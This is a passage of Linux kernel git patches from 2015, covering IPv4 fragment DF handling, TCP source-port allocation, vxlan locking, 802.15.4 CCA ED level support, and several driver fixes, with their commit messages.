mtu, int (*output)(struct sock *, struct sk_buff *)); /* Generate a checksum for an outgoing IP datagram. */ @@ -219,7 +220,8 @@ static inline int ip_finish_output2(struct sock *sk, struct sk_buff *skb) return -EINVAL; } -static int ip_finish_output_gso(struct sock *sk, struct sk_buff *skb) +static int ip_finish_output_gso(struct sock *sk, struct sk_buff *skb, + unsigned int mtu) { netdev_features_t features; struct sk_buff *segs; @@ -227,7 +229,7 @@ static int ip_finish_output_gso(struct sock *sk, struct sk_buff *skb) /* common case: locally created skb or seglen is <= mtu */ if (((IPCB(skb)->flags & IPSKB_FORWARDED) == 0) || - skb_gso_network_seglen(skb) <= ip_skb_dst_mtu(skb)) + skb_gso_network_seglen(skb) <= mtu) return ip_finish_output2(sk, skb); /* Slowpath - GSO segment length is exceeding the dst MTU. @@ -251,7 +253,7 @@ static int ip_finish_output_gso(struct sock *sk, struct sk_buff *skb) int err; segs->next = NULL; - err = ip_fragment(sk, segs, ip_finish_output2); + err = ip_fragment(sk, segs, mtu, ip_finish_output2); if (err && ret == 0) ret = err; @@ -263,6 +265,8 @@ static int ip_finish_output_gso(struct sock *sk, struct sk_buff *skb) static int ip_finish_output(struct sock *sk, struct sk_buff *skb) { + unsigned int mtu; + #if defined(CONFIG_NETFILTER) && defined(CONFIG_XFRM) /* Policy lookup after SNAT yielded a new policy */ if (skb_dst(skb)->xfrm) { @@ -270,11 +274,12 @@ static int ip_finish_output(struct sock *sk, struct sk_buff *skb) return dst_output_sk(sk, skb); } #endif + mtu = ip_skb_dst_mtu(skb); if (skb_is_gso(skb)) - return ip_finish_output_gso(sk, skb); + return ip_finish_output_gso(sk, skb, mtu); - if (skb->len > ip_skb_dst_mtu(skb)) - return ip_fragment(sk, skb, ip_finish_output2); + if (skb->len > mtu) + return ip_fragment(sk, skb, mtu, ip_finish_output2); return ip_finish_output2(sk, skb); } @@ -482,10 +487,10 @@ static void ip_copy_metadata(struct sk_buff *to, struct sk_buff *from) } static int ip_fragment(struct sock *sk, struct sk_buff *skb, + unsigned int mtu, int (*output)(struct sock *, struct sk_buff *)) { struct iphdr *iph = ip_hdr(skb); - unsigned int mtu = ip_skb_dst_mtu(skb); if (unlikely(((iph->frag_off & htons(IP_DF)) && !skb->ignore_df) || (IPCB(skb)->frag_max_size && From d6b915e29f4adea94bc02ba7675bb4f84e6a1abd Mon Sep 17 00:00:00 2001 From: Florian Westphal Date: Fri, 22 May 2015 16:32:51 +0200 Subject: [PATCH 302/872] ip_fragment: don't forward defragmented DF packet We currently always send fragments without DF bit set. Thus, given following setup: mtu1500 - mtu1500:1400 - mtu1400:1280 - mtu1280 A R1 R2 B Where R1 and R2 run linux with netfilter defragmentation/conntrack enabled, then if Host A sent a fragmented packet _with_ DF set to B, R1 will respond with icmp too big error if one of these fragments exceeded 1400 bytes. However, if R1 receives fragment sizes 1200 and 100, it would forward the reassembled packet without refragmenting, i.e. R2 will send an icmp error in response to a packet that was never sent, citing mtu that the original sender never exceeded. The other minor issue is that a refragmentation on R1 will conceal the MTU of R2-B since refragmentation does not set DF bit on the fragments. This modifies ip_fragment so that we track largest fragment size seen both for DF and non-DF packets, and set frag_max_size to the largest value. If the DF fragment size is larger or equal to the non-df one, we will consider the packet a path mtu probe: We set DF bit on the reassembled skb and also tag it with a new IPCB flag to force refragmentation even if skb fits outdev mtu. We will also set DF bit on each fragment in this case. Joint work with Hannes Frederic Sowa. Reported-by: Jesse Gross Signed-off-by: Florian Westphal Acked-by: Hannes Frederic Sowa Signed-off-by: David S. Miller --- include/net/inet_frag.h | 2 +- include/net/ip.h | 1 + net/ipv4/ip_fragment.c | 31 ++++++++++++++++++++++++++----- net/ipv4/ip_output.c | 12 ++++++++++-- 4 files changed, 38 insertions(+), 8 deletions(-) diff --git a/include/net/inet_frag.h b/include/net/inet_frag.h index 8d1765577acc..e1300b3dd597 100644 --- a/include/net/inet_frag.h +++ b/include/net/inet_frag.h @@ -43,7 +43,7 @@ enum { * @len: total length of the original datagram * @meat: length of received fragments so far * @flags: fragment queue flags - * @max_size: (ipv4 only) maximum received fragment size with IP_DF set + * @max_size: maximum received fragment size * @net: namespace that this frag belongs to */ struct inet_frag_queue { diff --git a/include/net/ip.h b/include/net/ip.h index 7921a36b805c..9b976cf99122 100644 --- a/include/net/ip.h +++ b/include/net/ip.h @@ -45,6 +45,7 @@ struct inet_skb_parm { #define IPSKB_FRAG_COMPLETE BIT(3) #define IPSKB_REROUTED BIT(4) #define IPSKB_DOREDIRECT BIT(5) +#define IPSKB_FRAG_PMTU BIT(6) u16 frag_max_size; }; diff --git a/net/ipv4/ip_fragment.c b/net/ipv4/ip_fragment.c index 47fa64ee82b1..a50dc6d408d1 100644 --- a/net/ipv4/ip_fragment.c +++ b/net/ipv4/ip_fragment.c @@ -75,6 +75,7 @@ struct ipq { __be16 id; u8 protocol; u8 ecn; /* RFC3168 support */ + u16 max_df_size; /* largest frag with DF set seen */ int iif; unsigned int rid; struct inet_peer *peer; @@ -326,6 +327,7 @@ static int ip_frag_queue(struct ipq *qp, struct sk_buff *skb) { struct sk_buff *prev, *next; struct net_device *dev; + unsigned int fragsize; int flags, offset; int ihl, end; int err = -ENOENT; @@ -481,9 +483,14 @@ static int ip_frag_queue(struct ipq *qp, struct sk_buff *skb) if (offset == 0) qp->q.flags |= INET_FRAG_FIRST_IN; + fragsize = skb->len + ihl; + + if (fragsize > qp->q.max_size) + qp->q.max_size = fragsize; + if (ip_hdr(skb)->frag_off & htons(IP_DF) && - skb->len + ihl > qp->q.max_size) - qp->q.max_size = skb->len + ihl; + fragsize > qp->max_df_size) + qp->max_df_size = fragsize; if (qp->q.flags == (INET_FRAG_FIRST_IN | INET_FRAG_LAST_IN) && qp->q.meat == qp->q.len) { @@ -613,13 +620,27 @@ static int ip_frag_reasm(struct ipq *qp, struct sk_buff *prev, head->next = NULL; head->dev = dev; head->tstamp = qp->q.stamp; - IPCB(head)->frag_max_size = qp->q.max_size; + IPCB(head)->frag_max_size = max(qp->max_df_size, qp->q.max_size); iph = ip_hdr(head); - /* max_size != 0 implies at least one fragment had IP_DF set */ - iph->frag_off = qp->q.max_size ? htons(IP_DF) : 0; iph->tot_len = htons(len); iph->tos |= ecn; + + /* When we set IP_DF on a refragmented skb we must also force a + * call to ip_fragment to avoid forwarding a DF-skb of size s while + * original sender only sent fragments of size f (where f < s). + * + * We only set DF/IPSKB_FRAG_PMTU if such DF fragment was the largest + * frag seen to avoid sending tiny DF-fragments in case skb was built + * from one very small df-fragment and one large non-df frag. + */ + if (qp->max_df_size == qp->q.max_size) { + IPCB(head)->flags |= IPSKB_FRAG_PMTU; + iph->frag_off = htons(IP_DF); + } else { + iph->frag_off = 0; + } + IP_INC_STATS_BH(net, IPSTATS_MIB_REASMOKS); qp->q.fragments = NULL; qp->q.fragments_tail = NULL; diff --git a/net/ipv4/ip_output.c b/net/ipv4/ip_output.c index d6dd8ba04441..f5f5ef1cebd5 100644 --- a/net/ipv4/ip_output.c +++ b/net/ipv4/ip_output.c @@ -278,7 +278,7 @@ static int ip_finish_output(struct sock *sk, struct sk_buff *skb) if (skb_is_gso(skb)) return ip_finish_output_gso(sk, skb, mtu); - if (skb->len > mtu) + if (skb->len > mtu || (IPCB(skb)->flags & IPSKB_FRAG_PMTU)) return ip_fragment(sk, skb, mtu, ip_finish_output2); return ip_finish_output2(sk, skb); @@ -492,7 +492,10 @@ static int ip_fragment(struct sock *sk, struct sk_buff *skb, { struct iphdr *iph = ip_hdr(skb); - if (unlikely(((iph->frag_off & htons(IP_DF)) && !skb->ignore_df) || + if ((iph->frag_off & htons(IP_DF)) == 0) + return ip_do_fragment(sk, skb, output); + + if (unlikely(!skb->ignore_df || (IPCB(skb)->frag_max_size && IPCB(skb)->frag_max_size > mtu))) { struct rtable *rt = skb_rtable(skb); @@ -537,6 +540,8 @@ int ip_do_fragment(struct sock *sk, struct sk_buff *skb, iph = ip_hdr(skb); mtu = ip_skb_dst_mtu(skb); + if (IPCB(skb)->frag_max_size && IPCB(skb)->frag_max_size < mtu) + mtu = IPCB(skb)->frag_max_size; /* * Setup starting values. @@ -732,6 +737,9 @@ int ip_do_fragment(struct sock *sk, struct sk_buff *skb, iph = ip_hdr(skb2); iph->frag_off = htons((offset >> 3)); + if (IPCB(skb)->flags & IPSKB_FRAG_PMTU) + iph->frag_off |= htons(IP_DF); + /* ANK: dirty, but effective trick. Upgrade options only if * the segment to be fragmented was THE FIRST (otherwise, * options are already fixed) and make it ONCE From f4ecf29fd78d19a9301e638eaa1419e5c8fbdce1 Mon Sep 17 00:00:00 2001 From: Benjamin Poirier Date: Fri, 22 May 2015 16:12:26 -0700 Subject: [PATCH 303/872] mlx4_core: Fix fallback from MSI-X to INTx The test in mlx4_load_one() to remove MLX4_FLAG_MSI_X expects mlx4_NOP() to fail with -EBUSY. It is also necessary to avoid the reset since the device is not fully reinitialized before calling mlx4_start_hca() a second time. Note that this will also affect mlx4_test_interrupts(), the only other user of MLX4_CMD_NOP. Fixes: f5aef5a ("net/mlx4_core: Activate reset flow upon fatal command cases") Signed-off-by: Benjamin Poirier Signed-off-by: David S. Miller --- drivers/net/ethernet/mellanox/mlx4/cmd.c | 9 +++++++-- 1 file changed, 7 insertions(+), 2 deletions(-) diff --git a/drivers/net/ethernet/mellanox/mlx4/cmd.c b/drivers/net/ethernet/mellanox/mlx4/cmd.c index 4f7dc044601e..529ef0594b90 100644 --- a/drivers/net/ethernet/mellanox/mlx4/cmd.c +++ b/drivers/net/ethernet/mellanox/mlx4/cmd.c @@ -714,8 +714,13 @@ static int mlx4_cmd_wait(struct mlx4_dev *dev, u64 in_param, u64 *out_param, msecs_to_jiffies(timeout))) { mlx4_warn(dev, "command 0x%x timed out (go bit not cleared)\n", op); - err = -EIO; - goto out_reset; + if (op == MLX4_CMD_NOP) { + err = -EBUSY; + goto out; + } else { + err = -EIO; + goto out_reset; + } } err = context->result; From fbfd3bc7dfd7efcad2d2e52bf634f84c80a77a35 Mon Sep 17 00:00:00 2001 From: Alex Deucher Date: Wed, 27 May 2015 11:33:26 -0400 Subject: [PATCH 304/872] drm/radeon/audio: make sure connector is valid in hotplug case Avoids a crash when a monitor is hotplugged and the encoder and connector are not linked yet. bug: https://bugs.freedesktop.org/show_bug.cgi?id=90681 Signed-off-by: Alex Deucher Cc: stable@vger.kernel.org --- drivers/gpu/drm/radeon/evergreen_hdmi.c | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/drivers/gpu/drm/radeon/evergreen_hdmi.c b/drivers/gpu/drm/radeon/evergreen_hdmi.c index 0926739c9fa7..9953356fe263 100644 --- a/drivers/gpu/drm/radeon/evergreen_hdmi.c +++ b/drivers/gpu/drm/radeon/evergreen_hdmi.c @@ -400,7 +400,7 @@ void evergreen_hdmi_enable(struct drm_encoder *encoder, bool enable) if (enable) { struct drm_connector *connector = radeon_get_connector_for_encoder(encoder); - if (drm_detect_monitor_audio(radeon_connector_edid(connector))) { + if (connector && drm_detect_monitor_audio(radeon_connector_edid(connector))) { WREG32(HDMI_INFOFRAME_CONTROL0 + dig->afmt->offset, HDMI_AVI_INFO_SEND | /* enable AVI info frames */ HDMI_AVI_INFO_CONT | /* required for audio info values to be updated */ @@ -438,7 +438,8 @@ void evergreen_dp_enable(struct drm_encoder *encoder, bool enable) if (!dig || !dig->afmt) return; - if (enable && drm_detect_monitor_audio(radeon_connector_edid(connector))) { + if (enable && connector && + drm_detect_monitor_audio(radeon_connector_edid(connector))) { struct drm_connector *connector = radeon_get_connector_for_encoder(encoder); struct radeon_connector *radeon_connector = to_radeon_connector(connector); struct radeon_connector_atom_dig *dig_connector; From e4390592a4fc3ee10a8bc4742197fdbac3935f74 Mon Sep 17 00:00:00 2001 From: Alexander Aring Date: Wed, 27 May 2015 13:42:09 +0200 Subject: [PATCH 305/872] nl802154: add support for cca ed level info This patch adds information about the current cca ed level when the phy is dumped over nl802154. Signed-off-by: Alexander Aring Reviewed-by: Varka Bhadram Signed-off-by: Marcel Holtmann --- net/ieee802154/nl802154.c | 7 +++++++ 1 file changed, 7 insertions(+) diff --git a/net/ieee802154/nl802154.c b/net/ieee802154/nl802154.c index 5c9d524ba02c..a89d9d024126 100644 --- a/net/ieee802154/nl802154.c +++ b/net/ieee802154/nl802154.c @@ -211,6 +211,7 @@ static const struct nla_policy nl802154_policy[NL802154_ATTR_MAX+1] = { [NL802154_ATTR_CCA_MODE] = { .type = NLA_U32, }, [NL802154_ATTR_CCA_OPT] = { .type = NLA_U32, }, + [NL802154_ATTR_CCA_ED_LEVEL] = { .type = NLA_S32, }, [NL802154_ATTR_SUPPORTED_CHANNEL] = { .type = NLA_U32, }, @@ -421,6 +422,12 @@ static int nl802154_send_wpan_phy(struct cfg802154_registered_device *rdev, goto nla_put_failure; } + if (rdev->wpan_phy.flags & WPAN_PHY_FLAG_CCA_ED_LEVEL) { + if (nla_put_s32(msg, NL802154_ATTR_CCA_ED_LEVEL, + rdev->wpan_phy.cca_ed_level)) + goto nla_put_failure; + } + if (nl802154_put_capabilities(msg, rdev)) goto nla_put_failure; From b69644c1c72e179738dd5c7e52e99d8550189472 Mon Sep 17 00:00:00 2001 From: Alexander Aring Date: Wed, 27 May 2015 13:42:10 +0200 Subject: [PATCH 306/872] nl802154: add support to set cca ed level This patch adds support for setting the current cca ed level value over nl802154. Signed-off-by: Alexander Aring Reviewed-by: Varka Bhadram Signed-off-by: Marcel Holtmann --- include/net/cfg802154.h | 1 + net/ieee802154/nl802154.c | 30 ++++++++++++++++++++++++++++++ net/ieee802154/rdev-ops.h | 11 +++++++++++ net/ieee802154/trace.h | 15 +++++++++++++++ net/mac802154/cfg.c | 19 +++++++++++++++++++ 5 files changed, 76 insertions(+) diff --git a/include/net/cfg802154.h b/include/net/cfg802154.h index 2e3bb012c2ff..290a9a69af07 100644 --- a/include/net/cfg802154.h +++ b/include/net/cfg802154.h @@ -44,6 +44,7 @@ struct cfg802154_ops { int (*set_channel)(struct wpan_phy *wpan_phy, u8 page, u8 channel); int (*set_cca_mode)(struct wpan_phy *wpan_phy, const struct wpan_phy_cca *cca); + int (*set_cca_ed_level)(struct wpan_phy *wpan_phy, s32 ed_level); int (*set_tx_power)(struct wpan_phy *wpan_phy, s32 power); int (*set_pan_id)(struct wpan_phy *wpan_phy, struct wpan_dev *wpan_dev, __le16 pan_id); diff --git a/net/ieee802154/nl802154.c b/net/ieee802154/nl802154.c index a89d9d024126..7dbb1f4ce7df 100644 --- a/net/ieee802154/nl802154.c +++ b/net/ieee802154/nl802154.c @@ -790,6 +790,28 @@ static int nl802154_set_cca_mode(struct sk_buff *skb, struct genl_info *info) return rdev_set_cca_mode(rdev, &cca); } +static int nl802154_set_cca_ed_level(struct sk_buff *skb, struct genl_info *info) +{ + struct cfg802154_registered_device *rdev = info->user_ptr[0]; + s32 ed_level; + int i; + + if (!(rdev->wpan_phy.flags & WPAN_PHY_FLAG_CCA_ED_LEVEL)) + return -EOPNOTSUPP; + + if (!info->attrs[NL802154_ATTR_CCA_ED_LEVEL]) + return -EINVAL; + + ed_level = nla_get_s32(info->attrs[NL802154_ATTR_CCA_ED_LEVEL]); + + for (i = 0; i < rdev->wpan_phy.supported.cca_ed_levels_size; i++) { + if (ed_level == rdev->wpan_phy.supported.cca_ed_levels[i]) + return rdev_set_cca_ed_level(rdev, ed_level); + } + + return -EINVAL; +} + static int nl802154_set_tx_power(struct sk_buff *skb, struct genl_info *info) { struct cfg802154_registered_device *rdev = info->user_ptr[0]; @@ -1122,6 +1144,14 @@ static const struct genl_ops nl802154_ops[] = { .internal_flags = NL802154_FLAG_NEED_WPAN_PHY | NL802154_FLAG_NEED_RTNL, }, + { + .cmd = NL802154_CMD_SET_CCA_ED_LEVEL, + .doit = nl802154_set_cca_ed_level, + .policy = nl802154_policy, + .flags = GENL_ADMIN_PERM, + .internal_flags = NL802154_FLAG_NEED_WPAN_PHY | + NL802154_FLAG_NEED_RTNL, + }, { .cmd = NL802154_CMD_SET_TX_POWER, .doit = nl802154_set_tx_power, diff --git a/net/ieee802154/rdev-ops.h b/net/ieee802154/rdev-ops.h index 36456118a6ec..b2155a123f6c 100644 --- a/net/ieee802154/rdev-ops.h +++ b/net/ieee802154/rdev-ops.h @@ -74,6 +74,17 @@ rdev_set_cca_mode(struct cfg802154_registered_device *rdev, return ret; } +static inline int +rdev_set_cca_ed_level(struct cfg802154_registered_device *rdev, s32 ed_level) +{ + int ret; + + trace_802154_rdev_set_cca_ed_level(&rdev->wpan_phy, ed_level); + ret = rdev->ops->set_cca_ed_level(&rdev->wpan_phy, ed_level); + trace_802154_rdev_return_int(&rdev->wpan_phy, ret); + return ret; +} + static inline int rdev_set_tx_power(struct cfg802154_registered_device *rdev, s32 power) diff --git a/net/ieee802154/trace.h b/net/ieee802154/trace.h index ac790bb1b4fe..73eb7605c1eb 100644 --- a/net/ieee802154/trace.h +++ b/net/ieee802154/trace.h @@ -123,6 +123,21 @@ TRACE_EVENT(802154_rdev_set_cca_mode, WPAN_CCA_PR_ARG) ); +TRACE_EVENT(802154_rdev_set_cca_ed_level, + TP_PROTO(struct wpan_phy *wpan_phy, s32 ed_level), + TP_ARGS(wpan_phy, ed_level), + TP_STRUCT__entry( + WPAN_PHY_ENTRY + __field(s32, ed_level) + ), + TP_fast_assign( + WPAN_PHY_ASSIGN; + __entry->ed_level = ed_level; + ), + TP_printk(WPAN_PHY_PR_FMT ", ed_level: %d", WPAN_PHY_PR_ARG, + __entry->ed_level) +); + DECLARE_EVENT_CLASS(802154_le16_template, TP_PROTO(struct wpan_phy *wpan_phy, struct wpan_dev *wpan_dev, __le16 le16arg), diff --git a/net/mac802154/cfg.c b/net/mac802154/cfg.c index ab12fa296eb3..317c4662e544 100644 --- a/net/mac802154/cfg.c +++ b/net/mac802154/cfg.c @@ -105,6 +105,24 @@ ieee802154_set_cca_mode(struct wpan_phy *wpan_phy, return ret; } +static int +ieee802154_set_cca_ed_level(struct wpan_phy *wpan_phy, s32 ed_level) +{ + struct ieee802154_local *local = wpan_phy_priv(wpan_phy); + int ret; + + ASSERT_RTNL(); + + if (wpan_phy->cca_ed_level == ed_level) + return 0; + + ret = drv_set_cca_ed_level(local, ed_level); + if (!ret) + wpan_phy->cca_ed_level = ed_level; + + return ret; +} + static int ieee802154_set_tx_power(struct wpan_phy *wpan_phy, s32 power) { @@ -213,6 +231,7 @@ const struct cfg802154_ops mac802154_config_ops = { .del_virtual_intf = ieee802154_del_iface, .set_channel = ieee802154_set_channel, .set_cca_mode = ieee802154_set_cca_mode, + .set_cca_ed_level = ieee802154_set_cca_ed_level, .set_tx_power = ieee802154_set_tx_power, .set_pan_id = ieee802154_set_pan_id, .set_short_addr = ieee802154_set_short_addr, From b5a61c306b0dddb28e3a3ab5d782c73e5f665497 Mon Sep 17 00:00:00 2001 From: Alexander Aring Date: Wed, 27 May 2015 14:11:28 +0200 Subject: [PATCH 307/872] atusb: add support for at86rf230 This patch adds support for the at86rf230 version check which is used by the rzusb stick. Signed-off-by: Alexander Aring Reviewed-by: Stefan Schmidt Signed-off-by: Marcel Holtmann --- drivers/net/ieee802154/atusb.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/drivers/net/ieee802154/atusb.c b/drivers/net/ieee802154/atusb.c index 1e18774240b2..5b6bb9adf9ae 100644 --- a/drivers/net/ieee802154/atusb.c +++ b/drivers/net/ieee802154/atusb.c @@ -515,7 +515,7 @@ static int atusb_get_and_show_chip(struct atusb *atusb) man_id_1, man_id_0); goto fail; } - if (part_num != 3) { + if (part_num != 3 && part_num != 2) { dev_err(&usb_dev->dev, "unexpected transceiver, part 0x%02x version 0x%02x\n", part_num, version_num); From 07f4c90062f8fc7c8c26f8f95324cbe8fa3145a5 Mon Sep 17 00:00:00 2001 From: Eric Dumazet Date: Sun, 24 May 2015 14:49:35 -0700 Subject: [PATCH 308/872] tcp/dccp: try to not exhaust ip_local_port_range in connect() A long standing problem on busy servers is the tiny available TCP port range (/proc/sys/net/ipv4/ip_local_port_range) and the default sequential allocation of source ports in connect() system call. If a host is having a lot of active TCP sessions, chances are very high that all ports are in use by at least one flow, and subsequent bind(0) attempts fail, or have to scan a big portion of space to find a slot. In this patch, I changed the starting point in __inet_hash_connect() so that we try to favor even [1] ports, leaving odd ports for bind() users. We still perform a sequential search, so there is no guarantee, but if connect() targets are very different, end result is we leave more ports available to bind(), and we spread them all over the range, lowering time for both connect() and bind() to find a slot. This strategy only works well if /proc/sys/net/ipv4/ip_local_port_range is even, ie if start/end values have different parity. Therefore, default /proc/sys/net/ipv4/ip_local_port_range was changed to 32768 - 60999 (instead of 32768 - 61000) There is no change on security aspects here, only some poor hashing schemes could be eventually impacted by this change. [1] : The odd/even property depends on ip_local_port_range values parity Signed-off-by: Eric Dumazet Signed-off-by: David S. Miller --- Documentation/networking/ip-sysctl.txt | 8 +++++--- net/ipv4/af_inet.c | 2 +- net/ipv4/inet_hashtables.c | 10 ++++++++-- 3 files changed, 14 insertions(+), 6 deletions(-) diff --git a/Documentation/networking/ip-sysctl.txt b/Documentation/networking/ip-sysctl.txt index cb083e0d682c..5fae7704daab 100644 --- a/Documentation/networking/ip-sysctl.txt +++ b/Documentation/networking/ip-sysctl.txt @@ -751,8 +751,10 @@ IP Variables: ip_local_port_range - 2 INTEGERS Defines the local port range that is used by TCP and UDP to choose the local port. The first number is the first, the - second the last local port number. The default values are - 32768 and 61000 respectively. + second the last local port number. + If possible, it is better these numbers have different parity. + (one even and one odd values) + The default values are 32768 and 60999 respectively. ip_local_reserved_ports - list of comma separated ranges Specify the ports which are reserved for known third-party @@ -775,7 +777,7 @@ ip_local_reserved_ports - list of comma separated ranges ip_local_port_range, e.g.: $ cat /proc/sys/net/ipv4/ip_local_port_range - 32000 61000 + 32000 60999 $ cat /proc/sys/net/ipv4/ip_local_reserved_ports 8080,9148 diff --git a/net/ipv4/af_inet.c b/net/ipv4/af_inet.c index 235d36afece3..6ad0f7a711c9 100644 --- a/net/ipv4/af_inet.c +++ b/net/ipv4/af_inet.c @@ -1595,7 +1595,7 @@ static __net_init int inet_init_net(struct net *net) */ seqlock_init(&net->ipv4.ip_local_ports.lock); net->ipv4.ip_local_ports.range[0] = 32768; - net->ipv4.ip_local_ports.range[1] = 61000; + net->ipv4.ip_local_ports.range[1] = 60999; seqlock_init(&net->ipv4.ping_group_range.lock); /* diff --git a/net/ipv4/inet_hashtables.c b/net/ipv4/inet_hashtables.c index 185efef0f125..1b336dc179f8 100644 --- a/net/ipv4/inet_hashtables.c +++ b/net/ipv4/inet_hashtables.c @@ -502,8 +502,14 @@ int __inet_hash_connect(struct inet_timewait_death_row *death_row, inet_get_local_port_range(net, &low, &high); remaining = (high - low) + 1; + /* By starting with offset being an even number, + * we tend to leave about 50% of ports for other uses, + * like bind(0). + */ + offset &= ~1; + local_bh_disable(); - for (i = 1; i <= remaining; i++) { + for (i = 0; i < remaining; i++) { port = low + (i + offset) % remaining; if (inet_is_local_reserved_port(net, port)) continue; @@ -547,7 +553,7 @@ int __inet_hash_connect(struct inet_timewait_death_row *death_row, return -EADDRNOTAVAIL; ok: - hint += i; + hint += (i + 2) & ~1; /* Head lock still held and bh's disabled */ inet_bind_hash(sk, tb, port); From 14e1d0fa97f821b42e8683500cf4ec817bb5d940 Mon Sep 17 00:00:00 2001 From: Sorin Dumitru Date: Tue, 26 May 2015 10:42:04 +0300 Subject: [PATCH 309/872] vxlan: release lock after each bucket in vxlan_cleanup We're seeing some softlockups from this function when there are a lot fdb entries on a vxlan device. Taking the lock for each bucket instead of the whole table is enough to fix that. Signed-off-by: Sorin Dumitru Signed-off-by: David S. Miller --- drivers/net/vxlan.c | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/drivers/net/vxlan.c b/drivers/net/vxlan.c index 5eddbc02c6c2..34c519eb1db5 100644 --- a/drivers/net/vxlan.c +++ b/drivers/net/vxlan.c @@ -2131,9 +2131,10 @@ static void vxlan_cleanup(unsigned long arg) if (!netif_running(vxlan->dev)) return; - spin_lock_bh(&vxlan->hash_lock); for (h = 0; h < FDB_HASH_SIZE; ++h) { struct hlist_node *p, *n; + + spin_lock_bh(&vxlan->hash_lock); hlist_for_each_safe(p, n, &vxlan->fdb_head[h]) { struct vxlan_fdb *f = container_of(p, struct vxlan_fdb, hlist); @@ -2152,8 +2153,8 @@ static void vxlan_cleanup(unsigned long arg) } else if (time_before(timeout, next_timer)) next_timer = timeout; } + spin_unlock_bh(&vxlan->hash_lock); } - spin_unlock_bh(&vxlan->hash_lock); mod_timer(&vxlan->age_timer, next_timer); } From 75aba2a52d955e6721b798600b115c9d73d8995c Mon Sep 17 00:00:00 2001 From: Edward Cree Date: Wed, 27 May 2015 13:13:54 +0100 Subject: [PATCH 310/872] sfc: add tracing of MCDI commands MCDI tracing is conditional on CONFIG_SFC_MCDI_LOGGING, which is enabled by default. Each MCDI command will produce a console line like sfc dom:bus:dev:fn ifname: MCDI RPC REQ: xxxxxxxx [yyyyyyyy...] where xxxxxxxx etc. are the raw MCDI payload in 32-bit hex chunks. The response will then produce a similar line with "RESP" instead of "REQ", and containing the MCDI response payload (if any). Signed-off-by: Edward Cree Signed-off-by: David S. Miller --- drivers/net/ethernet/sfc/Kconfig | 8 +++ drivers/net/ethernet/sfc/ef10.c | 3 ++ drivers/net/ethernet/sfc/mcdi.c | 91 ++++++++++++++++++++++++++++++-- drivers/net/ethernet/sfc/mcdi.h | 4 ++ 4 files changed, 102 insertions(+), 4 deletions(-) diff --git a/drivers/net/ethernet/sfc/Kconfig b/drivers/net/ethernet/sfc/Kconfig index 088921294448..c4ba42b1923f 100644 --- a/drivers/net/ethernet/sfc/Kconfig +++ b/drivers/net/ethernet/sfc/Kconfig @@ -36,3 +36,11 @@ config SFC_SRIOV This enables support for the SFC9000 I/O Virtualization features, allowing accelerated network performance in virtualized environments. +config SFC_MCDI_LOGGING + bool "Solarflare SFC9000/SFC9100-family MCDI logging support" + depends on SFC + default y + ---help--- + This enables support for tracing of MCDI (Management-Controller-to- + Driver-Interface) commands and responses, allowing debugging of + driver/firmware interaction. diff --git a/drivers/net/ethernet/sfc/ef10.c b/drivers/net/ethernet/sfc/ef10.c index a547cebff4e2..4eb6ab748f06 100644 --- a/drivers/net/ethernet/sfc/ef10.c +++ b/drivers/net/ethernet/sfc/ef10.c @@ -267,6 +267,9 @@ static int efx_ef10_probe(struct efx_nic *efx) return -ENOMEM; efx->nic_data = nic_data; + /* we assume later that we can copy from this buffer in dwords */ + BUILD_BUG_ON(MCDI_CTL_SDU_LEN_MAX_V2 % 4); + rc = efx_nic_alloc_buffer(efx, &nic_data->mcdi_buf, 8 + MCDI_CTL_SDU_LEN_MAX_V2, GFP_KERNEL); if (rc) diff --git a/drivers/net/ethernet/sfc/mcdi.c b/drivers/net/ethernet/sfc/mcdi.c index 8267a1c75771..31eda3255966 100644 --- a/drivers/net/ethernet/sfc/mcdi.c +++ b/drivers/net/ethernet/sfc/mcdi.c @@ -58,14 +58,20 @@ int efx_mcdi_init(struct efx_nic *efx) { struct efx_mcdi_iface *mcdi; bool already_attached; - int rc; + int rc = -ENOMEM; efx->mcdi = kzalloc(sizeof(*efx->mcdi), GFP_KERNEL); if (!efx->mcdi) - return -ENOMEM; + goto fail; mcdi = efx_mcdi(efx); mcdi->efx = efx; +#ifdef CONFIG_SFC_MCDI_LOGGING + /* consuming code assumes buffer is page-sized */ + mcdi->logging_buffer = (char *)__get_free_page(GFP_KERNEL); + if (!mcdi->logging_buffer) + goto fail1; +#endif init_waitqueue_head(&mcdi->wq); spin_lock_init(&mcdi->iface_lock); mcdi->state = MCDI_STATE_QUIESCENT; @@ -81,7 +87,7 @@ int efx_mcdi_init(struct efx_nic *efx) /* Recover from a failed assertion before probing */ rc = efx_mcdi_handle_assertion(efx); if (rc) - return rc; + goto fail2; /* Let the MC (and BMC, if this is a LOM) know that the driver * is loaded. We should do this before we reset the NIC. @@ -90,7 +96,7 @@ int efx_mcdi_init(struct efx_nic *efx) if (rc) { netif_err(efx, probe, efx->net_dev, "Unable to register driver with MCPU\n"); - return rc; + goto fail2; } if (already_attached) /* Not a fatal error */ @@ -102,6 +108,15 @@ int efx_mcdi_init(struct efx_nic *efx) efx->primary = efx; return 0; +fail2: +#ifdef CONFIG_SFC_MCDI_LOGGING + free_page((unsigned long)mcdi->logging_buffer); +fail1: +#endif + kfree(efx->mcdi); + efx->mcdi = NULL; +fail: + return rc; } void efx_mcdi_fini(struct efx_nic *efx) @@ -114,6 +129,10 @@ void efx_mcdi_fini(struct efx_nic *efx) /* Relinquish the device (back to the BMC, if this is a LOM) */ efx_mcdi_drv_attach(efx, false, NULL); +#ifdef CONFIG_SFC_MCDI_LOGGING + free_page((unsigned long)efx->mcdi->iface.logging_buffer); +#endif + kfree(efx->mcdi); } @@ -121,6 +140,9 @@ static void efx_mcdi_send_request(struct efx_nic *efx, unsigned cmd, const efx_dword_t *inbuf, size_t inlen) { struct efx_mcdi_iface *mcdi = efx_mcdi(efx); +#ifdef CONFIG_SFC_MCDI_LOGGING + char *buf = mcdi->logging_buffer; /* page-sized */ +#endif efx_dword_t hdr[2]; size_t hdr_len; u32 xflags, seqno; @@ -165,6 +187,31 @@ static void efx_mcdi_send_request(struct efx_nic *efx, unsigned cmd, hdr_len = 8; } +#ifdef CONFIG_SFC_MCDI_LOGGING + if (!WARN_ON_ONCE(!buf)) { + int bytes = 0; + int i; + /* Lengths should always be a whole number of dwords, so scream + * if they're not. + */ + WARN_ON_ONCE(hdr_len % 4); + WARN_ON_ONCE(inlen % 4); + + /* We own the logging buffer, as only one MCDI can be in + * progress on a NIC at any one time. So no need for locking. + */ + for (i = 